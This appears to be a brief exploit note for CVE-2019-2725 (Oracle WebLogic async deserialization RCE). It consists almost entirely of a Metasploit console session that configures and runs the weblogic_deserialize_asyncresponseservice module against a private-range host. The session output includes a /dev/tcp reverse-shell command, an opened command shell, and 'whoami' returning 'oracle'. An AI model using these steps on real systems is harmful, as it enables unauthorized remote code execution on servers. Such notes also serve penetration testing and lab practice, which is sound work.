CVE

CVE-2019-2725 - Oracle WebLogic WLS9-async Remote Code Execution

Exploit

msf5 use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set rhosts 10.10.10.13
msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set rport 7102
msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set ssl true
msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set lhost 10.10.10.1
msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > run

[+] 0<&218-;exec 218<>/dev/tcp/10.10.10.13/4444;sh <&218 >&218 2>&218
[*] Started reverse TCP handler on 10.10.10.1:4444
[*] Generating payload...
[*] Sending payload...
[*] Command shell session 1 opened (10.10.10.1:4444 -> 10.10.10.13:21207) at 2020-05-06 09:46:12 +0200

whoami
oracle

URL list